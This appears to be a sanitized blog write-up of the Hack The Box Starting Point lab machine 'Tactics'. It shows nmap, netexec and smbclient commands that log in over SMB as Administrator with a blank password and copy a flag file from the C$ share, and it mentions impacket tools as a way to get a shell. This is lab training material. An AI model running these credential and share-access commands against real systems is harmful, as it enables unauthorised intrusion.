Machine / Machines

Tactics

By Jennofrie Daguil ยท Cybersecurity and Red Team Operator

Target blocks ICMP, so -Pn is required. Result: Ports 135 (MSRPC), 139 (NetBIOS), 445 (SMB) open. Windows Server 2019. Null session denied. Tried Administrator with blank password: <redacted> [+] Tactics\Administrator: (Pwn3d!) -- Full admin access with blank...

EasyPublished 2026-05-07Sanitized local writeup

Scenario

Tactics attack path

Target blocks ICMP, so -Pn is required. Result: Ports 135 (MSRPC), 139 (NetBIOS), 445 (SMB) open. Windows Server 2019. Null session denied. Tried Administrator with blank credential: [+] Tactics\Administrator: (Pwn3d!) -- Full admin access with blank...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Tactics sanitized attack graph

Walkthrough flow

01

Only SMB services exposed (135, 139, 445)

02

Administrator account has blank credential

03

Full read/write to C$ and ADMIN$ shares

04

proof located at...

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

53% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Tactics/walkthrough.md
  • HTB/<TARGET>-Tactics/notes.md

Technical Walkthrough

Tactics - Walkthrough

Overview

FieldValue
Target<TARGET>
NameTactics
OSWindows 10 / Server 2019 Build 17763
DifficultyEasy (Starting Point)
Flag<hash redacted>
Time to Solve~5 minutes

Attack Path

text
SMB Anonymous Enum Failed โ†’ Administrator Blank Password โ†’ C$ Share Access โ†’ Flag

Step 1: Port Scan

Target blocks ICMP, so -Pn is required.

bash
nmap -Pn -sC -sV --min-rate 3000 <TARGET>

Result: Ports 135 (MSRPC), 139 (NetBIOS), 445 (SMB) open. Windows Server 2019.

Step 2: SMB Enumeration

Null session denied. Tried Administrator with blank password:

bash
netexec smb <TARGET> --shares -u 'Administrator' -p ''

Result: [+] Tactics\Administrator: (Pwn3d!) -- Full admin access with blank password.

Shares: ADMIN$ (RW), C$ (RW), IPC$ (R)

Step 3: Flag Retrieval

bash
smbclient //<TARGET>/C$ -U 'Administrator%' -c 'cd Users\Administrator\Desktop; get flag.txt /tmp/flag.txt'

Flag: <hash redacted>

Lessons Learned

  1. Always try Administrator with blank password on Windows Easy boxes
  2. Use -Pn when ICMP is blocked (host appears down but services respond)
  3. NetExec is the fastest way to validate SMB credentials and enumerate shares
  4. The "Tactics" name hints at tactical/quick enumeration approaches

Alternative Paths

  • Could also use impacket-psexec or impacket-wmiexec for shell access
  • impacket-smbclient works equally well for share browsing
  • WinRM was not exposed, so Evil-WinRM was not an option here

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: <TARGET> (Tactics)
  • OS: Windows 10 / Server 2019 Build 17763
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox)
  • Date: 2026-05-05

Recon

Nmap (Initial - TCP)

text
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
  • SMB signing: enabled but NOT required
  • Hostname: TACTICS, Domain: Tactics

SMB Enumeration

  • Null session: <secret redacted>
  • Administrator with blank password: SUCCESS (Pwn3d!)
  • Shares accessible: ADMIN$ (RW), C$ (RW), IPC$ (R)

Synthesis

  1. Only SMB services exposed (135, 139, 445)
  2. Administrator account has blank password
  3. Full read/write to C$ and ADMIN$ shares
  4. Flag located at C:\Users\Administrator\Desktop\flag.txt

Exploitation

  • Connected to C$ share as Administrator with blank password
  • Retrieved flag from Administrator Desktop

Flag

text
<hash redacted>

Credentials

UsernamePasswordAccess
Administrator(blank)Full admin - SMB C$/ADMIN$

Commands Used

bash
# Nmap scan
nmap -Pn -sC -sV --min-rate 3000 <TARGET>

# SMB enum with NetExec
netexec smb <TARGET> --shares -u 'Administrator' -p ''

# Flag retrieval
smbclient //<TARGET>/C$ -U 'Administrator%' -c 'cd Users\Administrator\Desktop; get flag.txt /tmp/flag.txt'

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase